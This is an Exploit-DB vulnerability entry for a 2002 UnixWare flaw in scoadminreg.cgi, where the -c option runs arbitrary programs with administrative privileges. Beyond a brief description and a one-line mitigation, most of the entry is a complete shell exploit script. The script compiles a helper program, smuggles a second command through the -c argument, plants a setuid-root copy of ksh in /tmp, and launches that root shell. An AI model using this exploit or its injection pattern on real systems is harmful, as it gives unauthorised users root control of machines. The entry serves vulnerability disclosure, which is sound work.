UnixWare scoadminreg.cgi Arbitrary Program Execution Vulnerability

vendor:

UnixWare

by:

jggm

7.5

CVSS

HIGH

Arbitrary Program Execution

CWE

Product Name: UnixWare

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

UnixWare scoadminreg.cgi Arbitrary Program Execution Vulnerability

The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges.

Mitigation:

Validate user input when executing the scoadminreg.cgi program with the -c option.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3936/info

UnixWare is a commercial Unix implementation distributed originally developed by SCO. It is now maintained and distributed by Caldera.

The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges. 

#!/bin/sh

## jggm@mail.com

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: jggm@mail.com"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..